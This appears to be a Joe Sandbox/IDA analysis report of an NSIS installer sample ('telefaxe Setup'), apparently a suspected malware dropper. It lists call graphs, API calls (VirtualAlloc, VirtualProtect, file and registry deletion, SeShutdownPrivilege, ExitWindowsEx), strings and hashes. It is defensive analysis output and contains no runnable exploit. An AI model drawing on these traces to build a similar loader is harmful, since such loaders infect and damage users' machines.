4843->4839 4844->4839 4845->4754 4846->4839 4849 6e4b12a8 GlobalFree 4848->4849 4850 6e4b126f GlobalAlloc lstrcpynA 4848->4850 4849->4758 4850->4849 4852 6e4b1577 wsprintfA 4851->4852 4853 6e4b15a4 lstrcpyA 4851->4853 4856 6e4b15bd 4852->4856 4853->4856 4856->4760 4858 6e4b24ac 4857->4858 4859 6e4b17ef 4857->4859 4858->4859 4860 6e4b24c5 GlobalFree 4858->4860 4859->4767 4859->4768 4860->4858 4862 6e4b1266 2 API calls 4861->4862 4863 6e4b1503 4862->4863 4863->4762 4864->4775 4865->4794 4867 6e4b1552 4866->4867 4867->4801 4874 6e4b1215 GlobalAlloc 4868->4874 4870 6e4b1233 lstrcpynA 4870->4797 4871->4806 4872->4798 4873->4802 4874->4870 4876 6e4b12b4 4875->4876 4877 6e4b1224 2 API calls 4876->4877 4878 6e4b12cf 4877->4878 4878->4812 4880 6e4b26aa 4879->4880 4881 6e4b2654 VirtualAlloc 4879->4881 4880->4815 4881->4880 4883 6e4b29ef 4882->4883 4884 6e4b29ff 4883->4884 4885 6e4b29f4 GetLastError 4883->4885 4884->4822 4885->4884 4886->4839 4888 6e4b12da 4887->4888 4889 6e4b12f9 4887->4889 4888->4889 4890 6e4b12e0 lstrcpyA 4888->4890 4889->4839 4890->4889 4891 40159d 4892 402bce 17 API calls 4891->4892 4893 4015a4 SetFileAttributesA 4892->4893 4894 4015b6 4893->4894 5416 40149d 5417 402387 5416->5417 5418 4014ab PostQuitMessage 5416->5418 5418->5417 5254 401a1e 5255 402bce 17 API calls 5254->5255 5256 401a27 ExpandEnvironmentStringsA 5255->5256 5257 401a3b 5256->5257 5259 401a4e 5256->5259 5258 401a40 lstrcmpA 5257->5258 5257->5259 5258->5259 4895 40171f 4896 402bce 17 API calls 4895->4896 4897 401726 SearchPathA 4896->4897 4898 401741 4897->4898 5648 401d1f 5649 402bac 17 API calls 5648->5649 5650 401d26 5649->5650 5651 402bac 17 API calls 5650->5651 5652 401d32 GetDlgItem 5651->5652 5653 402620 5652->5653 4906 402421 4907 402453 4906->4907 4908 402428 4906->4908 4910 402bce 17 API calls 4907->4910 4909 402c0e 17 API calls 4908->4909 4911 40242f 4909->4911 4912 40245a 4910->4912 4913 402439 4911->4913 4916 402467 4911->4916 4918 402c8c 4912->4918 4915 402bce 17 API calls 4913->4915 4917 402440 RegDeleteValueA RegCloseKey 4915->4917 4917->4916 4919 402c98 4918->4919 4920 402c9f 4918->4920 4919->4916 4920->4919 4922 402cd0 4920->4922 4923 405f7d RegOpenKeyExA 4922->4923 4924 402cfe 4923->4924 4925 402db3 4924->4925 4926 402d08 4924->4926 4925->4919 4927 402d0e RegEnumValueA 4926->4927 4931 402d31 4926->4931 4928 402d98 RegCloseKey 4927->4928 4927->4931 4928->4925 4929 402d6d RegEnumKeyA 4930 402d76 RegCloseKey 4929->4930 4929->4931 4932 406500 5 API calls 4930->4932 4931->4928 4931->4929 4931->4930 4933 402cd0 6 API calls 4931->4933 4934 402d86 4932->4934 4933->4931 4935 402da8 4934->4935 4936 402d8a RegDeleteKeyA 4934->4936 4935->4925 4936->4925 4937 4027a1 4938 402bce 17 API calls 4937->4938 4939 4027a8 FindFirstFileA 4938->4939 4940 4027cb 4939->4940 4941 4027bb 4939->4941 4942 4027d2 4940->4942 4945 406055 wsprintfA 4940->4945 4946 4060f7 lstrcpynA 4942->4946 4945->4942 4946->4941 5260 402626 5261 40262b 5260->5261 5262 40263f 5260->5262 5263 402bac 17 API calls 5261->5263 5264 402bce 17 API calls 5262->5264 5265 402634 5263->5265 5266 402646 lstrlenA 5264->5266 5267 405d37 WriteFile 5265->5267 5268 402668 5265->5268 5266->5265 5267->5268 5424 403ca7 5425 403dfa 5424->5425 5426 403cbf 5424->5426 5428 403e4b 5425->5428 5429 403e0b GetDlgItem GetDlgItem 5425->5429 5426->5425 5427 403ccb 5426->5427 5431 403cd6 SetWindowPos 5427->5431 5432 403ce9 5427->5432 5430 403ea5 5428->5430 5441 401389 2 API calls 5428->5441 5433 40417b 18 API calls 5429->5433 5435 4041c7 SendMessageA 5430->5435 5442 403df5 5430->5442 5431->5432 5436 403d06 5432->5436 5437 403cee ShowWindow 5432->5437 5434 403e35 SetClassLongA 5433->5434 5438 40140b 2 API calls 5434->5438 5462 403eb7 5435->5462 5439 403d28 5436->5439 5440 403d0e DestroyWindow 5436->5440 5437->5436 5438->5428 5444 403d2d SetWindowLongA 5439->5444 5445 403d3e 5439->5445 5443 404104 5440->5443 5446 403e7d 5441->5446 5443->5442 5452 404135 ShowWindow 5443->5452 5444->5442 5448 403db5 5445->5448 5449 403d4a GetDlgItem 5445->5449 5446->5430 5450 403e81 SendMessageA 5446->5450 5447 404106 DestroyWindow EndDialog 5447->5443 5455 4041e2 8 API calls 5448->5455 5453 403d7a 5449->5453 5454 403d5d SendMessageA IsWindowEnabled 5449->5454 5450->5442 5451 40140b 2 API calls 5451->5462 5452->5442 5457 403d87 5453->5457 5460 403dce SendMessageA 5453->5460 5461 403d9a 5453->5461 5467 403d7f 5453->5467 5454->5442 5454->5453 5455->5442 5456 40618a 17 API calls 5456->5462 5457->5460 5457->5467 5459 40417b 18 API calls 5459->5462 5460->5448 5463 403da2 5461->5463 5464 403db7 5461->5464 5462->5442 5462->5447 5462->5451 5462->5456 5462->5459 5468 40417b 18 API calls 5462->5468 5484 404046 DestroyWindow 5462->5484 5466 40140b 2 API calls 5463->5466 5465 40140b 2 API calls 5464->5465 5465->5467 5466->5467 5467->5448 5493 404154 5467->5493 5469 403f32 GetDlgItem 5468->5469 5470 403f47 5469->5470 5471 403f4f ShowWindow EnableWindow 5469->5471 5470->5471 5496 40419d EnableWindow 5471->5496 5473 403f79 EnableWindow 5478 403f8d 5473->5478 5474 403f92 GetSystemMenu EnableMenuItem SendMessageA 5475 403fc2 SendMessageA 5474->5475 5474->5478 5475->5478 5477 403c88 18 API calls 5477->5478 5478->5474 5478->5477 5497 4041b0 SendMessageA 5478->5497 5498 4060f7 lstrcpynA 5478->5498 5480 403ff1 lstrlenA 5481 40618a 17 API calls 5480->5481 5482 404002 SetWindowTextA 5481->5482 5483 401389 2 API calls 5482->5483 5483->5462 5484->5443 5485 404060 CreateDialogParamA 5484->5485 5485->5443 5486 404093 5485->5486 5487 40417b 18 API calls 5486->5487 5488 40409e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5487->5488 5489 401389 2 API calls 5488->5489 5490 4040e4 5489->5490 5490->5442 5491 4040ec ShowWindow 5490->5491 5492 4041c7 SendMessageA 5491->5492 5492->5443 5494 404161 SendMessageA 5493->5494 5495 40415b 5493->5495 5494->5448 5495->5494 5496->5473 5497->5478 5498->5480 4961 6e4b2921 4962 6e4b2971 4961->4962 4963 6e4b2931 VirtualProtect 4961->4963 4963->4962 4982 40272b 4983 402732 4982->4983 4986 4029aa 4982->4986 4984 402bac 17 API calls 4983->4984 4985 402739 4984->4985 4987 402748 SetFilePointer 4985->4987 4987->4986 4988 402758 4987->4988 4990 406055 wsprintfA 4988->4990 4990->4986 5001 401c2e 5002 402bac 17 API calls 5001->5002 5003 401c35 5002->5003 5004 402bac 17 API calls 5003->5004 5005 401c42 5004->5005 5006 402bce 17 API calls 5005->5006 5007 401c57 5005->5007 5006->5007 5008 402bce 17 API calls 5007->5008 5011 401c67 5007->5011 5008->5011 5009 401c72 5012 402bac 17 API calls 5009->5012 5010 401cbe 5013 402bce 17 API calls 5010->5013 5011->5009 5011->5010 5014 401c77 5012->5014 5015 401cc3 5013->5015 5017 402bac 17 API calls 5014->5017 5016 402bce 17 API calls 5015->5016 5018 401ccc FindWindowExA 5016->5018 5019 401c83 5017->5019 5022 401cea 5018->5022 5020 401c90 SendMessageTimeoutA 5019->5020 5021 401cae SendMessageA 5019->5021 5020->5022 5021->5022 5499 4042b1 lstrcpynA lstrlenA 5269 6e4b1638 5270 6e4b1667 5269->5270 5271 6e4b1a98 18 API calls 5270->5271 5272 6e4b166e 5271->5272 5273 6e4b1681 5272->5273 5274 6e4b1675 5272->5274 5276 6e4b168b 5273->5276 5277 6e4b16a8 5273->5277 5275 6e4b1266 2 API calls 5274->5275 5278 6e4b167f 5275->5278 5279 6e4b14e2 3 API calls 5276->5279 5280 6e4b16ae 5277->5280 5281 6e4b16d2 5277->5281 5283 6e4b1690 5279->5283 5284 6e4b1266 2 API calls 5280->5284 5282 6e4b14e2 3 API calls 5281->5282 5282->5278 5285 6e4b1266 2 API calls 5283->5285 5286 6e4b16b9 GlobalFree 5284->5286 5288 6e4b169c GlobalFree 5285->5288 5286->5278 5287 6e4b16cd GlobalFree 5286->5287 5287->5278 5288->5278 5029 401e35 GetDC 5030 402bac 17 API calls 5029->5030 5031 401e47 GetDeviceCaps MulDiv ReleaseDC 5030->5031 5032 402bac 17 API calls 5031->5032 5033 401e78 5032->5033 5034 40618a 17 API calls 5033->5034 5035 401eb5 CreateFontIndirectA 5034->5035 5036 402620 5035->5036 5036->5036 5289 402a35 SendMessageA 5290 402a5a 5289->5290 5291 402a4f InvalidateRect 5289->5291 5291->5290 5292 6e4b103d 5293 6e4b101b 5 API calls 5292->5293 5294 6e4b1056 5293->5294 5500 4014b7 5501 4014bd 5500->5501 5502 401389 2 API calls 5501->5502 5503 4014c5 5502->5503 5859 402dba 5860 402de2 5859->5860 5861 402dc9 SetTimer 5859->5861 5862 402e37 5860->5862 5863 402dfc MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5860->5863 5861->5860 5863->5862 5083 4015bb 5084 402bce 17 API calls 5083->5084 5085 4015c2 5084->5085 5086 405b28 4 API calls 5085->5086 5098 4015ca 5086->5098 5087 401624 5089 401652 5087->5089 5090 401629 5087->5090 5088 405aba CharNextA 5088->5098 5093 401423 24 API calls 5089->5093 5091 401423 24 API calls 5090->5091 5092 401630 5091->5092 5102 4060f7 lstrcpynA 5092->5102 5100 40164a 5093->5100 5095 405761 2 API calls 5095->5098 5096 40577e 5 API calls 5096->5098 5097 40163b SetCurrentDirectoryA 5097->5100 5098->5087 5098->5088 5098->5095 5098->5096 5099 40160c GetFileAttributesA 5098->5099 5101 4056e4 4 API calls 5098->5101 5099->5098 5101->5098 5102->5097 5504 4016bb 5505 402bce 17 API calls 5504->5505 5506 4016c1 GetFullPathNameA 5505->5506 5507 4016d8 5506->5507 5513 4016f9 5506->5513 5509 40646b 2 API calls 5507->5509 5507->5513 5508 40170d GetShortPathNameA 5510 402a5a 5508->5510 5511 4016e9 5509->5511 5511->5513 5514 4060f7 lstrcpynA 5511->5514 5513->5508 5513->5510 5514->5513 5295 6e4b1837 5296 6e4b185a 5295->5296 5297 6e4b188a GlobalFree 5296->5297 5298 6e4b189c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5296->5298 5297->5298 5299 6e4b1266 2 API calls 5298->5299 5300 6e4b1a1e GlobalFree GlobalFree 5299->5300

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 403348-403387 SetErrorMode GetVersion 1 403389-403391 call 406500 0->1 2 40339a 0->2 1->2 7 403393 1->7 4 40339f-4033b2 call 406492 lstrlenA 2->4 9 4033b4-4033d0 call 406500 * 3 4->9 7->2 16 4033e1-40343f #17 OleInitialize SHGetFileInfoA call 4060f7 GetCommandLineA call 4060f7 9->16 17 4033d2-4033d8 9->17 24 403441-403446 16->24 25 40344b-403460 call 405aba CharNextA 16->25 17->16 21 4033da 17->21 21->16 24->25 28 403525-403529 25->28 29 403465-403468 28->29 30 40352f 28->30 32 403470-403478 29->32 33 40346a-40346e 29->33 31 403542-40355c GetTempPathA call 403317 30->31 42 4035b4-4035ce DeleteFileA call 402ea1 31->42 43 40355e-40357c GetWindowsDirectoryA lstrcatA call 403317 31->43 35 403480-403483 32->35 36 40347a-40347b 32->36 33->32 33->33 37 403515-403522 call 405aba 35->37 38 403489-40348d 35->38 36->35 37->28 57 403524 37->57 40 4034a5-4034d2 38->40 41 40348f-403495 38->41 47 4034d4-4034da 40->47 48 4034e5-403513 40->48 45 403497-403499 41->45 46 40349b 41->46 60 403662-403672 call 403830 OleUninitialize 42->60 61 4035d4-4035da 42->61 43->42 59 40357e-4035ae GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403317 43->59 45->40 45->46 46->40 52 4034e0 47->52 53 4034dc-4034de 47->53 48->37 55 403531-40353d call 4060f7 48->55 52->48 53->48 53->52 55->31 57->28 59->42 59->60 72 403796-40379c 60->72 73 403678-403688 call 405813 ExitProcess 60->73 64 403652-403659 call 40390a 61->64 65 4035dc-4035e7 call 405aba 61->65 70 40365e 64->70 74 4035e9-403612 65->74 75 40361d-403627 65->75 70->60 77 403818-403820 72->77 78 40379e-4037b7 GetCurrentProcess OpenProcessToken 72->78 79 403614-403616 74->79 82 403629-403636 call 405b7d 75->82 83 40368e-4036a2 call 40577e lstrcatA 75->83 80 403822 77->80 81 403826-40382a ExitProcess 77->81 85 4037e9-4037f7 call 406500 78->85 86 4037b9-4037e3 LookupPrivilegeValueA AdjustTokenPrivileges 78->86 79->75 87 403618-40361b 79->87 80->81 82->60 94 403638-40364e call 4060f7 * 2 82->94 95 4036a4-4036aa lstrcatA 83->95 96 4036af-4036c9 lstrcatA lstrcmpiA 83->96 97 403805-40380f ExitWindowsEx 85->97 98 4037f9-403803 85->98 86->85 87->75 87->79 94->64 95->96 96->60 101 4036cb-4036ce 96->101 97->77 99 403811-403813 call 40140b 97->99 98->97 98->99 99->77 105 4036d0-4036d5 call 4056e4 101->105 106 4036d7 call 405761 101->106 110 4036dc-4036e9 SetCurrentDirectoryA 105->110 106->110 113 4036f6-40371e call 4060f7 110->113 114 4036eb-4036f1 call 4060f7 110->114 118 403724-403740 call 40618a DeleteFileA 113->118 114->113 121 403781-403788 118->121 122 403742-403752 CopyFileA 118->122 121->118 123 40378a-403791 call 405ed6 121->123 122->121 124 403754-403774 call 405ed6 call 40618a call 405796 122->124 123->60 124->121 133 403776-40377d CloseHandle 124->133 133->121
                                                        APIs
                                                        • SetErrorMode.KERNELBASE ref: 0040336D
                                                        • GetVersion.KERNEL32 ref: 00403373
                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                        • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                        • OleInitialize.OLE32(00000000), ref: 004033E9
                                                        • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                        • GetCommandLineA.KERNEL32(telefaxe Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\dIPYIbWXs1.exe",00000020,"C:\Users\user\Desktop\dIPYIbWXs1.exe",00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                        • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                          • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                          • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                          • Part of subcall function 0040390A: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,74DF3410), ref: 004039FA
                                                          • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                          • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                          • Part of subcall function 0040390A: LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                          • Part of subcall function 0040390A: RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                          • Part of subcall function 00403830: CloseHandle.KERNEL32(000002E0,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                        • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                        • ExitProcess.KERNEL32 ref: 00403688
                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                        • ExitProcess.KERNEL32 ref: 0040382A
                                                          • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                        • String ID: "$"C:\Users\user\Desktop\dIPYIbWXs1.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\dIPYIbWXs1.exe$C:\Users\user\tranchet$C:\Users\user\tranchet\Trykmaalere$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kt$telefaxe Setup$~nsu
                                                        • API String ID: 3776617018-1307871048
                                                        • Opcode ID: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                        • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                        • Opcode Fuzzy Hash: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                        • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 337 4058bf-4058e5 call 405b7d 340 4058e7-4058f9 DeleteFileA 337->340 341 4058fe-405905 337->341 342 405a88-405a8c 340->342 343 405907-405909 341->343 344 405918-405928 call 4060f7 341->344 345 405a36-405a3b 343->345 346 40590f-405912 343->346 350 405937-405938 call 405ad6 344->350 351 40592a-405935 lstrcatA 344->351 345->342 348 405a3d-405a40 345->348 346->344 346->345 352 405a42-405a48 348->352 353 405a4a-405a52 call 40646b 348->353 354 40593d-405940 350->354 351->354 352->342 353->342 361 405a54-405a68 call 405a8f call 405877 353->361 357 405942-405949 354->357 358 40594b-405951 lstrcatA 354->358 357->358 360 405956-405974 lstrlenA FindFirstFileA 357->360 358->360 362 40597a-405991 call 405aba 360->362 363 405a2c-405a30 360->363 373 405a80-405a83 call 40521e 361->373 374 405a6a-405a6d 361->374 371 405993-405997 362->371 372 40599c-40599f 362->372 363->345 365 405a32 363->365 365->345 371->372 375 405999 371->375 376 4059a1-4059a6 372->376 377 4059b2-4059c0 call 4060f7 372->377 373->342 374->352 379 405a6f-405a7e call 40521e call 405ed6 374->379 375->372 381 4059a8-4059aa 376->381 382 405a0b-405a1d FindNextFileA 376->382 387 4059c2-4059ca 377->387 388 4059d7-4059e2 call 405877 377->388 379->342 381->377 386 4059ac-4059b0 381->386 382->362 385 405a23-405a26 FindClose 382->385 385->363 386->377 386->382 387->382 390 4059cc-4059d5 call 4058bf 387->390 397 405a03-405a06 call 40521e 388->397 398 4059e4-4059e7 388->398 390->382 397->382 400 4059e9-4059f9 call 40521e call 405ed6 398->400 401 4059fb-405a01 398->401 400->382 401->382
                                                        APIs
                                                        • DeleteFileA.KERNELBASE(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                        • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                        • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                        • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                        • FindFirstFileA.KERNELBASE(0042B898,?,?,?,0040A014,?,0042B898,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                        • FindClose.KERNEL32(00000000), ref: 00405A26
                                                        Strings
                                                        • \*.*, xrefs: 0040592A
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                        • "C:\Users\user\Desktop\dIPYIbWXs1.exe", xrefs: 004058BF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: "C:\Users\user\Desktop\dIPYIbWXs1.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                        • API String ID: 2035342205-58457572
                                                        • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                        • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                        • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                        • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                        APIs
                                                        • CoCreateInstance.OLE32(00408524,?,?,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                        Strings
                                                        • C:\Users\user\tranchet\Trykmaalere, xrefs: 00402230
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                        • String ID: C:\Users\user\tranchet\Trykmaalere
                                                        • API String ID: 123533781-1398828102
                                                        • Opcode ID: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                        • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                        • Opcode Fuzzy Hash: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                        • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                        APIs
                                                        • FindFirstFileA.KERNELBASE(74DF3410,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                        • FindClose.KERNELBASE(00000000), ref: 00406482
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                        • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                        • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                        • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                        APIs
                                                        • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 004027B0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
